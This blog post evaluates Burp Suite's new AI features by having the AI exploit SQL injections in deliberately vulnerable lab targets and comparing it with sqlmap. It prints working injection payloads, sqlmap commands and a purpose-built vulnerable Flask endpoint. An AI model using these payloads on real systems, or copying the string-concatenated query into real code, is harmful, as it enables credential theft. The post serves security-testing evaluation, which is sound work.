Posted by smarttecs-patrick at May 21 2025 > Explore

Burp AI - Evaluating the new AI Capabilities in Action

2025/05/21

2506 words

12 mins

On March 31, 2025 PortSwigger officially released a new version of their security tool Burp Suite. We had already tested AI-powered extensions via the “Early Adopters” build of Burp Suite Pro and published our results in the blog post titled “Using AI in Security Testing” ¹. However, the results so far have been limited in scope and often too generic.

The new Burp Suite Release

With the official release of Burp Suite Professional 2025.2, PortSwigger introduced Burp AI ². In a zoom call, they presented all their improvement and new functionalities. Alongside performance improvements, they also demonstrated five new features related to AI. These are:

Explore Issue
Explainer
Broken access control false positive reduction
AI-powered recorded logins
AI-powered extensions

In the following sections, we test these new features using concrete examples. For our testing, we used Burp Suite Professional v2025.3-37651 (Early Adopter).

Explore Issue

With the “Explore Issue” functionality, you can task an AI to investigate an issue found by Burp Scanner via Active Scan. Therefore, this feature can be found in the context menu of issues in the Dashboard. PortSwigger mentions the AI can be used to “efficiently validate issues, generate proof-of-concept (PoC) exploits, and uncover additional attack vectors” ³.

To do so, the AI has the following capabilities:

Select appropriate Burp tools to use.
Structure and send requests to test different exploitation techniques.
Handle responses dynamically, adjusting its approach based on the target system’s behavior.
Generate and validate PoC exploits to demonstrate real-world impact.
Identify additional attack vectors beyond Burp Scanner’s initial findings, including privilege escalation paths or data exposure risks.

Let’s give it a try and verify the promised functionality firsthand. First, we need a vulnerable application to run an active scan on and identify an issue. We used three different vulnerable applications to test the new features:

the OWASP Juice Shop ,
a PortSwigger Academy lab and
a self-developed Python web application.

To better understand the AI’s workflow, we compared multiple issue explorations involving similar vulnerabilities — specifically, SQL injections. This allows us to analyze how the AI adapts its approach depending on the context, as well as to assess the overall cost and value of the feature.
Our evaluation begins with a straightforward SQL injection in the well-documented “Juice Shop”. We then move on to a slightly obfuscated version to test the AI’s ability to interpret context, and finally, we examine a fully custom, timing-based SQL injection to assess how it handles more complex and less conventional scenarios.

SQL injection in the Juice Shop

The OWASP Juice Shop is a deliberately insecure web application designed to help users learn and practice modern web security testing. For our evaluation, we used version 17.2.0. One of its known vulnerabilities is a SQL injection flaw in the product search bar — a textbook example of a common attack vector.

To detect this issue, Burp Suite’s active scanner can be used. By highlighting the q parameter in the search request with the Inspector and running an active scan, the scanner flags the SQL injection and logs it as an issue in the dashboard.

Active Scan finds SQL injection in the Juice Shop search

From here, the new “Explore Issue” feature lets you delegate the investigation to the AI. To get started, click the Explore issue button after selecting a vulnerability. This opens a new Task in the Dashboard, where you can track its progress in real time.

The AI then performs a step-by-step analysis of the issue, recording each action it takes along with the reasoning and results. If it uses tools like Repeater or Inspector during the process, you’ll see visual representations at the relevant steps.

Once the investigation is complete, a summary is generated that outlines what the AI did and what it found.

AI Exploration of the SQL injection in the Juice shop search

The steps the AI executed for this exploration are:

[ 91 credits] Determine the number of columns in the production table via UNION SELECT with NULL
[ 78 credits] Retry the column count with proper URL encoding
[105 credits] Enumerate the database tables
[ 73 credits] Retrieve the schema of the Users table
[162 credits] Extract user credentials from the Users table and generate the summary

Total credit usage: 509 credits (0,25€)

Using these steps, the AI successfully exploited the vulnerability and exfiltrated user credentials. The final used command is the following GET request:

/rest/products/search?q=%27))%20UNION%20SELECT%20id,email,password,role,role,role,role,role,role%20FROM%20Users--

While the overall process was technically correct, much of it relied on guesswork. This was largely due to the fact that query responses were truncated after a predefined length — likely to conserve token usage. As a result, essential information was cut off. A human tester would have spotted this missing data, but the AI had to infer or guess instead.

A test with sqlmap shows that this tool would also have been able to exploit the vulnerability. By running the following command, a boolean-based blind and a time-based blind entry points were detected:

sqlmap -u http://localhost:5000/rest/products/search?q=search --risk=3 --level=3 -p q

However, since the Juice Shop is a well-known target with publicly available solutions, it’s not ideal for testing the AI’s broader capabilities. To get a more accurate sense of its effectiveness, we’ll need to use a custom or less-documented vulnerability.

SQL injection in PortSwigger Academy

The second SQL injection we want to explore is actually part of the PortSwigger Academy. The exact lab used is called “SQL injection attack, listing the database contents on non-Oracle databases”. This time the task is a bit more challenging, because the name of the users and password table is unique.

Again, the AI tries to determine the number of columns in the query via a UNION SELECT with NULL and manages to determine there are two columns in the response.

[ 54 credits] Determine the number of columns in query
[ 60 credits] Try UNION SELECT with two columns
[ 98 credits] Enumerate the database tables
[109 credits] Enumerate the columns in users table
[119 credits] Extract usernames and passwords
[131 credits] List user-created tables and schemas
[150 credits] Get column information for users_xzcvaz table
[165 credits] Extract usernames and passwords from users_xzcvaz and generate summary

Total credit usage: 965 credits (0,48€)

The AI summarises it’s exploitation as follows:

We have successfully extracted credentials from the users_xzcvaz table, obtaining username and password pairs for multiple users including administrator ([pw]), carlos ([pw]), and wiener ([pw]). The credentials were stored in plaintext format in a Postgres database.

The correct table and column names were found on the second try, even though their names are slightly obfuscated.

The tool sqlmap manages to find 4 injection points: boolean-based blind, stacked queries, time-based blind and UNION query. With it a successful extraction of username and password is also possible and just as fast. The used command is:

sqlmap -u "https://<session-id>.web-security-academy.net/filter?category=Gifts" --risk=3 --level=3 -p category

SQL injection in custom Flask server

To further test the limits of the exploration functionality, we wrote a small Flask server in Python. This allows for fine-tuning of the injection complexity.

As a simple test scenario, we set up an endpoint vulnerable to timing-based attacks through an input parameter called password. When a request is received, the server queries a SQLite3 database and returns the query execution time in the response. A simple WAF that blocks all request containing “OR” is present to increase the difficulty.

@app.route("/timing")
def timing():
    """
    # Solution:
    GET /timing?password=pwA...%%27%20AND%201337=LIKE(%27ABCDEFG%27,UPPER(HEX(RANDOMBLOB(500000000/2))))%20--
    """
    start = time.time()
    password = request.values.get("password")

    if "OR" in password:
      return "Blocked by WAF"

    with sqlite3.connect(db_filename) as db:
        cursor = db.cursor()

        try:
            # Execute the vulnerable SQL query concatenating user-provided input.
            sql_command = (
                "SELECT * FROM users WHERE username = 'admin' AND password LIKE '%s'"
                % (password)
            )
            res = cursor.execute(sql_command)
            print(sql_command)

            # If the query returns any matching record, consider the current user logged in.
            record = res.fetchone()
        except Exception as e:
            print(f"[ERR]: {e}")

    response = "Answer returned after {elapsed_time:.4f} seconds."
    return response.format(elapsed_time=time.time() - start)

By manipulating the input and observing how long the query takes, it’s possible to exploit this timing behavior. Specifically, you can infer the correct password character by character, based on how the response time changes with each guess.

[54 credits] Test for TRUE condition in SQL injection
[59 credits] Test for boolean-based blind SQL injection
[66 credits] Test for time-based SQL injection with proper encoding
[73 credits] Test PostgreSQL-specific time-based injection
[80 credits] Test for SQLite database with version check
[87 credits] Test SQLite with heavy processing condition
[81 credits] Write summary

Total credit usage: 500 credits (0,25€)

The AI’s exploration process was impressive in its methodology, even if it didn’t fully succeed in exploiting the vulnerability. It correctly identified that the backend database was SQLite and quickly pivoted to a timing-based SQL injection strategy, which is the right direction given the context. However, the attack failed to trigger meaningful time delays. This was likely due to SQLite’s atypical handling of the randomblob() function, which requires a slightly non-standard payload to induce a measurable latency — something the AI did not manage to detect. Despite the failure, the AI made several informed attempts, consuming 500 AI credits in total.

Interestingly, even tools like sqlmap struggled in this scenario. Only when provided with an optimized command where the test level is 5, will the injection point be found. Otherwise it is registered as a false positive.

sqlmap -u http://localhost:3000/timing?password=pwA --level=5 --risk=3 -p password --dbms=SQLite --technique=T

sqlmap identified the following injection point(s) with a total of 88 HTTP(s) requests:
---
Parameter: password (GET)
    Type: time-based blind
    Title: SQLite > 2.0 AND time-based blind (heavy query)
    Payload: password=a'||(SELECT CHAR(66,82,100,100) WHERE 6644=6644 AND 6200=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))||'
---
[05:13:29] [INFO] the back-end DBMS is SQLite

Comparing the Explorations

The AI’s exploration process is adaptive — each step is informed by the outcomes of previous ones. This dynamic approach allows it to respond to subtle obfuscations, such as changes in parameter or function names, as demonstrated in the second test.

Even if the exploration doesn’t lead to a successful exploit, the process still provides valuable learnings. Step-by-step visibility gives you a clear view of the AI’s reasoning and actions, making it easy to manually verify, replicate or refine its approach. In addition, any AI-generated requests can be passed to Repeater or Intruder for deeper manual testing.

Generating a new step typically takes around 10 seconds, which provides a reasonable pace for automated exploration. The cost per exploration varies between 400 and 1,000 AI credits. Given that 10,000 credits cost 5€, this translates to approximately 0.20€ to 0.50€ per exploration.

If the AI succeeds, you get a simple, reproducible exploit that demonstrates the vulnerability. However, if it doesn’t, further manual testing is still required. It’s also important to note that AI exploration is limited to issues identified through a Burp Suite scan — you can’t define custom targets manually or provide extra context to guide the AI during its analysis.

Test object	Vulnerability	Cost	Burp AI	sqlmap
Juice Shop	Simple SQL injection	509 credits	✅	✅
PortSwigger	Obfuscated SQL injection	965 credits	✅	✅
Flask	Timing based SQL injection	500 credits	❌	✅

In a comparison with tools like sqlmap there is not much of an advantage. Instead of one vulnerability, sqlmap manages to identify multiple entry points and also allows you to exploit them in a convenient way. Additionally, it is more configurable and deterministic in its execution.

One advantage of the AI is the small amount of requests it uses. Usually only a single request is generated per step, which is a lot more “quiet” than the dozens of request sqlmap sends while exploring.

Explainer

Apart from the issue exploration, PortSwigger also introduced a new functionality called Explainer. In the Repeater, you can now highlight text, right-click, and select “Explain this” from the context menu. The explanation then appears in the Explanations section of the sidebar. Its use cases are:

Gathering information, such as identifying which framework uses a particular header
Explaining JavaScript code, HTTP headers, cookies, or HTML tags from a security perspective

“Explain this” button in context menu of selection Explanation in Sidebar The generated explanations are concise and technically focused, often zeroing in on the relevant libraries or parameters. It’s clear that a prompt template is guiding the response to keep it short and centered on technical detail. In contrast, a ChatGPT-4o response tends to be longer by default unless explicitly asked to respond in one or two sentences.

As noted in our previous Burp AI blog post ¹, response length correlates with cost. Thanks to its brevity, each explanation here only costs 3 AI credits.

The main advantage lies in convenience — you get quick insights without leaving Burp Suite to do basic security research.

Broken access control false positive reduction

PortSwigger aims to reduce the number of false positive issues with their automated scans by using AI to double-check the issues. Currently, this functionality is only implemented for “Broken access control” issues.

While this approach shows potential, a simpler and more reliable alternative is the “Autorize” extension, available through the BApp Store. It offers effective manual and semi-automated testing for access control issues without relying on AI verification.

AI-powered recorded logins

Repeated login attempts can be frustrating during testing. The recorded login functionality is therefore a welcome addition. It allows you to automatically record simple login sequences, removing the need to configure macros manually.

Xre0us, however, found no benefit compared to setting up a login macro yourself in his blogpost . His conclusion is that simple logins, like the ones the AI can generate, could be set up for cheaper by yourself and the AI fails to configure more complex login scenarios.

AI-powered extensions

In a previous blogpost, we already explored the functionality provided by integrating an AI API for extensions. We also compared already existing extensions using the AI capabilities in their cost and performance as well as built our own example extension. You can find our findings here .

Conclusion

The new AI tools are clearly focused on specific functionalities. This specialization allows for fine-tuning within a defined context — a key factor, as we concluded in our last blog post .

Still, the testing results point to an evolution in convenience, not a revolution in capability. While the added context does improve response quality, it also highlights a core limitation — like other automated tools, the AI adapts to known vulnerabilities but lacks true creativity or problem-solving beyond established patterns. Ultimately, most of what it achieved could have been done more reliably and at a lower cost using conventional, dedicated tools.

Overall, the new AI features serve primarily as a convenience. They allow for quick exploration of issues — not necessarily to confirm a vulnerability, but to spark ideas for further investigation. However, their usefulness tends to diminish with increased experience in cybersecurity, especially when weighed against the additional costs, compared to established tools.